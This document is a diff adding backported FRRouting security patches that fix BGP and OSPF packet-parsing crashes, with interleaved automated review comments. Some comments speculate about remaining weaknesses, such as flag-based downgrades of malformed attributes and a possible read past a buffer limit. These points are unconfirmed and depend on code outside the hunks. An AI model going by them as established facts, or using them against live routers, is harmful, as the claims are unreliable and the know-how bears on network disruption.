++ */ + if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && + !length) +- return BGP_ATTR_PARSE_PROCEED; ++ return BGP_ATTR_PARSE_WITHDRAW; + + /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required + to carry any other path attributes.", though if MP_REACH_NLRI or NLRI +@@ -3532,7 +3535,13 @@ done: + aspath_unintern(&as4_path); + + transit = bgp_attr_get_transit(attr); +- if (ret != BGP_ATTR_PARSE_ERROR) { ++ /* If we received an UPDATE with mandatory attributes, then ++ * the unrecognized transitive optional attribute of that ++ * path MUST be passed. Otherwise, it's an error, and from ++ * security perspective it might be very harmful if we continue ++ * here with the unrecognized attributes. ++ */ ++ if (ret == BGP_ATTR_PARSE_PROCEED) { + /* Finally intern unknown attribute. */ + if (transit) + bgp_attr_set_transit(attr, transit_intern(transit)); +-- +2.35.3 + diff --git a/0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch b/0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch new file mode 100644 index 0000000..b46d113 --- /dev/null +++ b/0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch 
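Review bot: Narrowing the intern condition at `done:` to `ret == BGP_ATTR_PARSE_PROCEED` sends a BGP_ATTR_PARSE_WITHDRAW result with a non-NULL `transit` down the other branch, which is outside the hunk; confirm that branch frees the un-interned `transit` and clears it on `attr`, otherwise every treat-as-withdraw UPDATE that pairs unknown transitive attributes with a missing mandatory attribute (now a reachable path, per the mandatory-attribute check below this function) leaks that buffer. The new comment quotes the RFC wording but not the consequence; `/* Only intern unknown transitive attributes for a fully valid UPDATE; on withdraw or error they are dropped, never propagated. */` says what the branch does. bgp_attr_parse starts and ends outside the hunk.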
@@ -0,0 +1,90 @@ +From 4e39893cfb2d4dbc13fa6d6a25bbf623ed14a4fb Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Sun, 29 Oct 2023 22:44:45 +0200 +Subject: [PATCH] bgpd: Ignore handling NLRIs if we received MP_UNREACH_NLRI +Upstream: yes +CVE-2023-47234,bsc#1216897,https://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf + +If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if +no mandatory path attributes received. + +In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled +as a new data, but without mandatory attributes, it's a malformed packet. + +In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST +handle that. + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index fc92dbb326..ae0f052c42 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3112,15 +3112,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + !length) + return BGP_ATTR_PARSE_WITHDRAW; + +- /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +- to carry any other path attributes.", though if MP_REACH_NLRI or NLRI +- are present, it should. Check for any other attribute being present +- instead. +- */ +- if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && +- CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))) +- return BGP_ATTR_PARSE_PROCEED; +- + if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN))) + type = BGP_ATTR_ORIGIN; + +@@ -3139,6 +3130,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + && !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF))) + type = BGP_ATTR_LOCAL_PREF; + ++ /* An UPDATE message that contains the MP_UNREACH_NLRI is not required ++ * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI ++ * are present, it should. 
Check for any other attribute being present ++ * instead. ++ */ ++ if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && ++ CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))) ++ return type ? BGP_ATTR_PARSE_MISSING_MANDATORY ++ : BGP_ATTR_PARSE_PROCEED; ++ + /* If any of the well-known mandatory attributes are not present + * in an UPDATE message, then "treat-as-withdraw" MUST be used. + */ +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index 23767153b2..27708c0689 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -382,6 +382,7 @@ enum bgp_attr_parse_ret { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, ++ BGP_ATTR_PARSE_MISSING_MANDATORY = -4, + }; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index 20c642190b..b175a26ab9 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1951,7 +1951,12 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) + /* Network Layer Reachability Information. */ + update_len = end - stream_pnt(s); + +- if (update_len && attribute_len) { ++ /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then ++ * NLRIs should be handled as a new data. Though, if we received ++ * NLRIs without mandatory attributes, they should be ignored. ++ */ ++ if (update_len && attribute_len && ++ attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) { + /* Set NLRI portion to structure. */ + nlris[NLRI_UPDATE].afi = AFI_IP; + nlris[NLRI_UPDATE].safi = SAFI_UNICAST; +-- +2.35.3 + diff --git a/0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch b/0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch new file mode 100644 index 0000000..a0e9c5a --- /dev/null +++ b/0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch 
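Review bot: `BGP_ATTR_PARSE_MISSING_MANDATORY` is a negative enum value, so the existing `if (ret < 0) goto done;` after bgp_attr_check (visible in the previous patch) and any `attr_parse_ret < 0` test in bgp_update_receive treat it like a parse error; the hunk only excludes it from `nlris[NLRI_UPDATE]` handling, and whether it can still reach a NOTIFICATION elsewhere in bgp_update_receive is outside the hunk and should be confirmed. The new enum member is the only one in that block without a comment; suggest `/* MP_UNREACH_NLRI present but mandatory attributes missing: process the withdraws, ignore any plain NLRI, never reset the session */`. bgp_attr_check and bgp_update_receive both start and end outside the hunk.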
@@ -0,0 +1,58 @@
+From 6979aa1574167121e260120504c77b47bb25230e Mon Sep 17 00:00:00 2001
+From: Donald Sharp
+Date: Fri, 3 Mar 2023 21:58:33 -0500
+Subject: [PATCH] bgpd: Fix use beyond end of stream of labeled unicast parsing
+Upstream: yes
+CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f
+
+Fixes a couple crashes associated with attempting to read
+beyond the end of the stream.
+
+Reported-by: Iggy Frankovic
+Signed-off-by: Donald Sharp
+(cherry picked from commit 7404a914b0cafe046703c8381903a80d3def8f8b)
+Signed-off-by: Marius Tomaschewski
+
+diff --git a/bgpd/bgp_label.c b/bgpd/bgp_label.c
+index 38f34a8927..64d1ff70ca 100644
+--- a/bgpd/bgp_label.c
++++ b/bgpd/bgp_label.c
+@@ -312,6 +312,9 @@ static int bgp_nlri_get_labels(struct peer *peer, uint8_t *pnt, uint8_t plen,
+ uint8_t llen = 0;
+ uint8_t label_depth = 0;
+ 
++ if (plen < BGP_LABEL_BYTES)
++ return 0;
++
+ for (; data < lim; data += BGP_LABEL_BYTES) {
+ memcpy(label, data, BGP_LABEL_BYTES);
+ llen += BGP_LABEL_BYTES;
+@@ -374,6 +377,9 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr,
+ memcpy(&addpath_id, pnt, BGP_ADDPATH_ID_LEN);
+ addpath_id = ntohl(addpath_id);
+ pnt += BGP_ADDPATH_ID_LEN;
++
++ if (pnt >= lim)
++ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
+ }
+ 
+ /* Fetch prefix length. */
+@@ -392,6 +398,15 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr,
+ 
+ /* Fill in the labels */
+ llen = bgp_nlri_get_labels(peer, pnt, psize, &label);
++ if (llen == 0) {
++ flog_err(
++ EC_BGP_UPDATE_RCV,
++ "%s [Error] Update packet error (wrong label length 0)",
++ peer->host);
++ bgp_notify_send(peer, BGP_NOTIFY_UPDATE_ERR,
++ BGP_NOTIFY_UPDATE_INVAL_NETWORK);
++ return BGP_NLRI_PARSE_ERROR_LABEL_LENGTH;
++ }
+ p.prefixlen = prefixlen - BSIZE(llen);
+ 
+ /* There needs to be at least one label */
+-- 
+2.35.3
+
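Review bot: The new `plen < BGP_LABEL_BYTES` guard in bgp_nlri_get_labels only proves the first label fits; the loop below still does `memcpy(label, data, BGP_LABEL_BYTES)` while `data < lim`, so if `lim` is `pnt + plen` (declared outside the hunk) and no label carries the bottom-of-stack bit, the last iteration can copy up to two bytes past `lim` whenever `plen` is not a multiple of three. Making the bound explicit, `for (; data + BGP_LABEL_BYTES <= lim; data += BGP_LABEL_BYTES)`, removes the dependence on the stack bit. The `llen == 0` handling in bgp_nlri_parse_label matches the new early return, but `0` now also means "too short", which the log text does not say; a comment such as `/* 0: NLRI too short to hold even one label */` would help. bgp_nlri_get_labels and bgp_nlri_parse_label both start and end outside the hunk.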
diff --git a/0018-bgpd-Flowspec-overflow-issue.patch b/0018-bgpd-Flowspec-overflow-issue.patch
new file mode 100644
index 0000000..7081c2e
--- /dev/null
+++ b/0018-bgpd-Flowspec-overflow-issue.patch
@@ -0,0 +1,37 @@
+From d4ead6bc0b2f0d4682661837d202502127060476 Mon Sep 17 00:00:00 2001
+From: Donald Sharp
+Date: Thu, 23 Feb 2023 13:29:32 -0500
+Subject: [PATCH] bgpd: Flowspec overflow issue
+Upstream: yes
+CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3
+
+According to the flowspec RFC 8955 a flowspec nlri is >
+Specifying 0 as a length makes BGP get all warm on the inside. Which
+in this case is not a good thing at all. Prevent warmth, stay cold
+on the inside.
+
+Reported-by: Iggy Frankovic
+Signed-off-by: Donald Sharp
+Signed-off-by: Marius Tomaschewski
+
+diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c
+index fe1f0d50f8..98ec1ed073 100644
+--- a/bgpd/bgp_flowspec.c
++++ b/bgpd/bgp_flowspec.c
+@@ -148,6 +148,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr,
+ psize);
+ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
+ }
++
++ if (psize == 0) {
++ flog_err(EC_BGP_FLOWSPEC_PACKET,
++ "Flowspec NLRI length 0 which makes no sense");
++ return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW;
++ }
++
+ if (bgp_fs_nlri_validate(pnt, psize, afi) < 0) {
+ flog_err(
+ EC_BGP_FLOWSPEC_PACKET,
+-- 
+2.35.3
+
diff --git a/0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch b/0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch
new file mode 100644
index 0000000..624015b
--- /dev/null
+++ b/0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch
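Review bot: The `psize == 0` branch returns `BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW`, the code the preceding overflow branch uses, although nothing overflowed; if bgp_route.h has a flowspec-specific bad-format parse error, returning that keeps the caller's error accounting and any alerting on this code accurate. The log text could state the rule being enforced rather than an opinion, e.g. `"Flowspec NLRI length 0 is invalid: an NLRI must carry at least one component"`. The commit text `a flowspec nlri is >` has lost the rest of its sentence and should be completed before it lands in the changelog. bgp_nlri_parse_flowspec starts and ends outside the hunk.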
@@ -0,0 +1,121 @@ +From 51679e4504546584d98673b76ed8e12a8bc74fe0 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Wed, 27 Mar 2024 18:42:56 +0200 +Subject: [PATCH 1/2] bgpd: Fix error handling when receiving BGP Prefix SID + attribute +References: bsc#1222518 CVE-2024-31948 gh#FRRouting/frr#15628 + + +Without this patch, we always set the BGP Prefix SID attribute flag without +checking if it's malformed or not. RFC8669 says that this attribute MUST be discarded. + +Also, this fixes the bgpd crash when a malformed Prefix SID attribute is received, +with malformed transitive flags and/or TLVs. + +Reported-by: Iggy Frankovic +Signed-off-by: Donatas Abraitis +(cherry picked from commit ba6a8f1a31e1a88df2de69ea46068e8bd9b97138) +--- + bgpd/bgp_attr.c | 5 +++-- + 1 file changed, 3 insertions(+), 2 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 7144c4bfa73d..2e2845b8fa7e 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -1400,6 +1400,7 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode, + case BGP_ATTR_AS4_AGGREGATOR: + case BGP_ATTR_AGGREGATOR: + case BGP_ATTR_ATOMIC_AGGREGATE: ++ case BGP_ATTR_PREFIX_SID: + return BGP_ATTR_PARSE_PROCEED; + + /* Core attributes, particularly ones which may influence route +@@ -3146,8 +3147,6 @@ enum bgp_attr_parse_ret bgp_attr_prefix_sid(struct bgp_attr_parser_args *args) + struct attr *const attr = args->attr; + enum bgp_attr_parse_ret ret; + +- attr->flag |= ATTR_FLAG_BIT(BGP_ATTR_PREFIX_SID); +- + uint8_t type; + uint16_t length; + size_t headersz = sizeof(type) + sizeof(length); +@@ -3197,6 +3196,8 @@ enum bgp_attr_parse_ret bgp_attr_prefix_sid(struct bgp_attr_parser_args *args) + } + } + ++ SET_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_PREFIX_SID)); ++ + return BGP_ATTR_PARSE_PROCEED; + } + + +From 9240abccb564043c85180916b77cad5b194a49c9 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Wed, 27 Mar 2024 19:08:38 +0200 +Subject: [PATCH 2/2] bgpd: Prevent from one more 
CVE triggering this place +References: bsc#1222518 CVE-2024-31948 gh#FRRouting/frr#15628 +Upstream: submitted + +If we receive an attribute that is handled by bgp_attr_malformed(), use +treat-as-withdraw behavior for unknown (or missing to add - if new) attributes. + +Signed-off-by: Donatas Abraitis +(cherry picked from commit babb23b74855e23c987a63f8256d24e28c044d07) +--- + bgpd/bgp_attr.c | 33 ++++++++++++++++++++++----------- + 1 file changed, 22 insertions(+), 11 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 2e2845b8fa7e..7570598a3d7f 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -1391,6 +1391,15 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode, + (args->startp - STREAM_DATA(BGP_INPUT(peer))) + + args->total); + ++ /* Partial optional attributes that are malformed should not cause ++ * the whole session to be reset. Instead treat it as a withdrawal ++ * of the routes, if possible. ++ */ ++ if (CHECK_FLAG(flags, BGP_ATTR_FLAG_TRANS) && ++ CHECK_FLAG(flags, BGP_ATTR_FLAG_OPTIONAL) && ++ CHECK_FLAG(flags, BGP_ATTR_FLAG_PARTIAL)) ++ return BGP_ATTR_PARSE_WITHDRAW; ++ + switch (args->type) { + /* where an attribute is relatively inconsequential, e.g. it does not + * affect route selection, and can be safely ignored, then any such +@@ -1425,19 +1434,21 @@ bgp_attr_malformed(struct bgp_attr_parser_args *args, uint8_t subcode, + bgp_notify_send_with_data(peer, BGP_NOTIFY_UPDATE_ERR, subcode, + notify_datap, length); + return BGP_ATTR_PARSE_ERROR; ++ default: ++ /* Unknown attributes, that are handled by this function ++ * should be treated as withdraw, to prevent one more CVE ++ * from being introduced. ++ * RFC 7606 says: ++ * The "treat-as-withdraw" approach is generally preferred ++ * and the "session reset" approach is discouraged. 
++ */ ++ flog_err(EC_BGP_ATTR_FLAG, ++ "%s(%u) attribute received, while it is not known how to handle it, treating as withdraw", ++ lookup_msg(attr_str, args->type, NULL), args->type); ++ break; + } + +- /* Partial optional attributes that are malformed should not cause +- * the whole session to be reset. Instead treat it as a withdrawal +- * of the routes, if possible. +- */ +- if (CHECK_FLAG(flags, BGP_ATTR_FLAG_TRANS) +- && CHECK_FLAG(flags, BGP_ATTR_FLAG_OPTIONAL) +- && CHECK_FLAG(flags, BGP_ATTR_FLAG_PARTIAL)) +- return BGP_ATTR_PARSE_WITHDRAW; +- +- /* default to reset */ +- return BGP_ATTR_PARSE_ERROR_NOTIFYPLS; ++ return BGP_ATTR_PARSE_WITHDRAW; + } + + /* Find out what is wrong with the path attribute flag bits and log the error. diff --git a/0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch b/0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch new file mode 100644 index 0000000..2c1979e --- /dev/null +++ b/0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch 
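Review bot: Moving the OPTIONAL|TRANS|PARTIAL shortcut ahead of `switch (args->type)` changes the outcome for the core attribute types handled inside that switch, which previously reached `bgp_notify_send_with_data(...)` and `return BGP_ATTR_PARSE_ERROR` unconditionally; the flags are whatever the peer put on the wire, so a peer can now convert a malformed core attribute into treat-as-withdraw by setting those three bits, and for MP_REACH_NLRI/MP_UNREACH_NLRI (if they are in that case list, which is partly outside the hunk) RFC 7606 as I read it requires session reset because the NLRI cannot be determined. Suggest keeping the early return but excluding the NLRI-carrying attributes: `if (args->type != BGP_ATTR_MP_REACH_NLRI && args->type != BGP_ATTR_MP_UNREACH_NLRI && CHECK_FLAG(flags, BGP_ATTR_FLAG_TRANS) && ...)`. The new `default:` also retires `BGP_ATTR_PARSE_ERROR_NOTIFYPLS` as a return value of this function, so any caller still comparing against it becomes dead code and is worth a grep. bgp_attr_malformed starts outside the hunk.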
@@ -0,0 +1,37 @@
+From 285c19a3c665087720e1fea7d8d944c961c52288 Mon Sep 17 00:00:00 2001
+From: Olivier Dugeon
+Date: Mon, 26 Feb 2024 10:40:34 +0100
+Subject: [PATCH] ospfd: Solved crash in OSPF TE parsing
+Upstream: yes
+References: bsc#1220548, CVE-2024-27913, gh#FRRouting/frr#15431
+
+Iggy Frankovic discovered an ospfd crash when perfomring fuzzing of OSPF LSA
+packets. The crash occurs in ospf_te_parse_te() function when attemping to
+create corresponding egde from TE Link parameters. If there is no local
+address, an edge is created but without any attributes. During parsing, the
+function try to access to this attribute fields which has not been created
+causing an ospfd crash.
+
+The patch simply check if the te parser has found a valid local address. If not
+found, we stop the parser which avoid the crash.
+
+Signed-off-by: Olivier Dugeon
+
+diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
+index 75f4e0c9f0..45eb205759 100644
+--- a/ospfd/ospf_te.c
++++ b/ospfd/ospf_te.c
+@@ -2276,6 +2276,10 @@ static int ospf_te_parse_te(struct ls_ted *ted, struct ospf_lsa *lsa)
+ }
+ 
+ /* Get corresponding Edge from Link State Data Base */
++ if (IPV4_NET0(attr.standard.local.s_addr) && !attr.standard.local_id) {
++ ote_debug(" |- Found no TE Link local address/ID. Abort!");
++ return -1;
++ }
+ edge = get_edge(ted, attr.adv, attr.standard.local);
+ old = edge->attributes;
+ 
+-- 
+2.35.3
+
diff --git a/0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch b/0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch
new file mode 100644
index 0000000..09ff0a3
--- /dev/null
+++ b/0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch
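Review bot: The new guard lets a link through when `local_id` is set but the `local` address is zero, yet the next line still calls `get_edge(ted, attr.adv, attr.standard.local)` with that zero address, so the unnumbered-link case can reach the same `edge->attributes` access the commit says crashed; confirm get_edge keys on `local_id` for that case, or extend the abort to it. `old = edge->attributes;` also never checks that `edge` is non-NULL, so if get_edge can fail, `if (!edge) return -1;` belongs here too. The early return should say what is discarded: `/* No local address or ID: the Link TLV cannot be matched to an edge; drop this LSA. */`. ospf_te_parse_te starts and ends outside the hunk.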
@@ -0,0 +1,67 @@
+From 298704f1e73221172432e2a4afd79086ffcd4cca Mon Sep 17 00:00:00 2001
+From: Olivier Dugeon
+Date: Wed, 3 Apr 2024 16:28:23 +0200
+Upstream: yes
+References: CVE-2024-31950,bsc#1222526,gh#FRRouting/frr#16088
+Subject: [PATCH 1/3] ospfd: Solved crash in RI parsing with OSPF TE
+
+Iggy Frankovic discovered another ospfd crash when performing fuzzing of OSPF
+LSA packets. The crash occurs in ospf_te_parse_ri() function when attemping to
+read Segment Routing subTLVs. The original code doesn't check if the size of
+the SR subTLVs have the correct length. In presence of erronous LSA, this will
+cause a buffer overflow and ospfd crash.
+
+This patch introduces new verification of the subTLVs size for Router
+Information TLV.
+
+Co-authored-by: Iggy Frankovic
+Signed-off-by: Olivier Dugeon
+(cherry picked from commit f69d1313b19047d3d83fc2b36a518355b861dfc4)
+---
+ ospfd/ospf_te.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
+index 45eb205759..885b915585 100644
+--- a/ospfd/ospf_te.c
++++ b/ospfd/ospf_te.c
+@@ -2483,6 +2483,9 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
+
+ switch (ntohs(tlvh->type)) {
+ case RI_SR_TLV_SR_ALGORITHM:
++ if (TLV_BODY_SIZE(tlvh) < 1 ||
++ TLV_BODY_SIZE(tlvh) > ALGORITHM_COUNT)
++ break;
+ algo = (struct ri_sr_tlv_sr_algorithm *)tlvh;
+
+ for (int i = 0; i < ntohs(algo->header.length); i++) {
+@@ -2507,6 +2510,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
+ break;
+
+ case RI_SR_TLV_SRGB_LABEL_RANGE:
++ if (TLV_BODY_SIZE(tlvh) != RI_SR_TLV_LABEL_RANGE_SIZE)
++ break;
+ range = (struct ri_sr_tlv_sid_label_range *)tlvh;
+ size = GET_RANGE_SIZE(ntohl(range->size));
+ lower = GET_LABEL(ntohl(range->lower.value));
+@@ -2524,6 +2529,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
+ break;
+
+ case RI_SR_TLV_SRLB_LABEL_RANGE:
++ if (TLV_BODY_SIZE(tlvh) != RI_SR_TLV_LABEL_RANGE_SIZE)
++ break;
+ range = (struct ri_sr_tlv_sid_label_range *)tlvh;
+ size = GET_RANGE_SIZE(ntohl(range->size));
+ lower = GET_LABEL(ntohl(range->lower.value));
+@@ -2541,6 +2548,8 @@ static int ospf_te_parse_ri(struct ls_ted *ted, struct ospf_lsa *lsa)
+ break;
+
+ case RI_SR_TLV_NODE_MSD:
++ if (TLV_BODY_SIZE(tlvh) < RI_SR_TLV_NODE_MSD_SIZE)
++ break;
+ msd = (struct ri_sr_tlv_node_msd *)tlvh;
+ if ((CHECK_FLAG(node->flags, LS_NODE_MSD))
+ && (node->msd == msd->value))
+--
+2.35.3
+
diff --git a/0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch b/0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch
new file mode 100644
index 0000000..2e2a40a
--- /dev/null
+++ b/0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch
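Review bot: The four new size checks `break` out of the switch silently, so a crafted or corrupt Router Information sub-TLV is dropped without any trace, unlike the aborts in ospf_te_parse_te() and the Extended LSA parsers, which log through ote_debug(); for an input class that was a CVE-grade crash trigger, a line such as `ote_debug(" |- Wrong SR sub-TLV size (type %u, len %u). Skip!", ntohs(tlvh->type), TLV_BODY_SIZE(tlvh));` before each `break` would give operators a signal when a neighbour starts sending malformed LSAs. The checks also only compare each sub-TLV body against its expected fixed size; whether `tlvh->length` was bounded against the remaining LSA length by the enclosing `for` loop is outside this hunk and worth confirming, since otherwise an oversized length in the last sub-TLV still reads past the LSA. The enclosing ospf_te_parse_ri() starts and ends outside the hunk.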
@@ -0,0 +1,109 @@
+From 4e70b09f24b72fbb27ff5eda63393bfd2a72ef37 Mon Sep 17 00:00:00 2001
+From: Olivier Dugeon
+Date: Fri, 5 Apr 2024 12:57:11 +0200
+Upstream: yes
+References: CVE-2024-31951,bsc#1222528,gh#FRRouting/frr#16088
+Subject: [PATCH 2/3] ospfd: Correct Opaque LSA Extended parser
+
+Iggy Frankovic discovered another ospfd crash when performing fuzzing of OSPF
+LSA packets. The crash occurs in ospf_te_parse_ext_link() function when
+attemping to read Segment Routing Adjacency SID subTLVs. The original code
+doesn't check if the size of the Extended Link TLVs and subTLVs have the correct
+length. In presence of erronous LSA, this will cause a buffer overflow and ospfd
+crashes.
+
+This patch introduces new verification of the subTLVs size for Extended Link
+TLVs and subTLVs. Similar check has been also introduced for the Extended
+Prefix TLV.
+
+Co-authored-by: Iggy Frankovic
+Signed-off-by: Olivier Dugeon
+(cherry picked from commit 5557a289acdaeec8cc63ffc97b5c2abf6dee7b3a)
+---
+ ospfd/ospf_te.c | 35 +++++++++++++++++++++++++++++++++--
+ 1 file changed, 33 insertions(+), 2 deletions(-)
+
+diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
+index 885b915585..23a1b181ec 100644
+--- a/ospfd/ospf_te.c
++++ b/ospfd/ospf_te.c
+@@ -2647,6 +2647,7 @@ static int ospf_te_parse_ext_pref(struct ls_ted *ted, struct ospf_lsa *lsa)
+ struct ext_tlv_prefix *ext;
+ struct ext_subtlv_prefix_sid *pref_sid;
+ uint32_t label;
++ uint16_t len, size;
+
+ /* Get corresponding Subnet from Link State Data Base */
+ ext = (struct ext_tlv_prefix *)TLV_HDR_TOP(lsa->data);
+@@ -2668,6 +2669,18 @@ static int ospf_te_parse_ext_pref(struct ls_ted *ted, struct ospf_lsa *lsa)
+ ote_debug(" |- Process Extended Prefix LSA %pI4 for subnet %pFX",
+ &lsa->data->id, &pref);
+
++ /*
++ * Check Extended Prefix TLV size against LSA size
++ * as only one TLV is allowed per LSA
++ */
++ len = TLV_BODY_SIZE(&ext->header);
++ size = lsa->size - (OSPF_LSA_HEADER_SIZE + TLV_HDR_SIZE);
++ if (len != size || len <= 0) {
++ ote_debug(" |- Wrong TLV size: %u instead of %u",
++ (uint32_t)len, (uint32_t)size);
++ return -1;
++ }
++
+ /* Initialize TLV browsing */
+ ls_pref = subnet->ls_pref;
+ pref_sid = (struct ext_subtlv_prefix_sid *)((char *)(ext) + TLV_HDR_SIZE
+@@ -2778,8 +2791,20 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
+ ote_debug(" |- Process Extended Link LSA %pI4 for edge %pI4",
+ &lsa->data->id, &edge->attributes->standard.local);
+
+- /* Initialize TLV browsing */
+- len = TLV_BODY_SIZE(&ext->header) - EXT_TLV_LINK_SIZE;
++ /*
++ * Check Extended Link TLV size against LSA size
++ * as only one TLV is allowed per LSA
++ */
++ len = TLV_BODY_SIZE(&ext->header);
++ i = lsa->size - (OSPF_LSA_HEADER_SIZE + TLV_HDR_SIZE);
++ if (len != i || len <= 0) {
++ ote_debug(" |- Wrong TLV size: %u instead of %u",
++ (uint32_t)len, (uint32_t)i);
++ return -1;
++ }
++
++ /* Initialize subTLVs browsing */
++ len -= EXT_TLV_LINK_SIZE;
+ tlvh = (struct tlv_header *)((char *)(ext) + TLV_HDR_SIZE
+ + EXT_TLV_LINK_SIZE);
+ for (; sum < len; tlvh = TLV_HDR_NEXT(tlvh)) {
+@@ -2789,6 +2814,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
+
+ switch (ntohs(tlvh->type)) {
+ case EXT_SUBTLV_ADJ_SID:
++ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_ADJ_SID_SIZE)
++ break;
+ adj = (struct ext_subtlv_adj_sid *)tlvh;
+ label = CHECK_FLAG(adj->flags,
+ EXT_SUBTLV_LINK_ADJ_SID_VFLG)
+@@ -2815,6 +2842,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
+
+ break;
+ case EXT_SUBTLV_LAN_ADJ_SID:
++ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_LAN_ADJ_SID_SIZE)
++ break;
+ ladj = (struct ext_subtlv_lan_adj_sid *)tlvh;
+ label = CHECK_FLAG(ladj->flags,
+ EXT_SUBTLV_LINK_ADJ_SID_VFLG)
+@@ -2844,6 +2873,8 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
+
+ break;
+ case EXT_SUBTLV_RMT_ITF_ADDR:
++ if (TLV_BODY_SIZE(tlvh) != EXT_SUBTLV_RMT_ITF_ADDR_SIZE)
++ break;
+ rmt = (struct ext_subtlv_rmt_itf_addr *)tlvh;
+ if (CHECK_FLAG(atr->flags, LS_ATTR_NEIGH_ADDR)
+ && IPV4_ADDR_SAME(&atr->standard.remote,
+--
+2.35.3
+
diff --git a/0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch b/0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch
new file mode 100644
index 0000000..e6073bf
--- /dev/null
+++ b/0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch
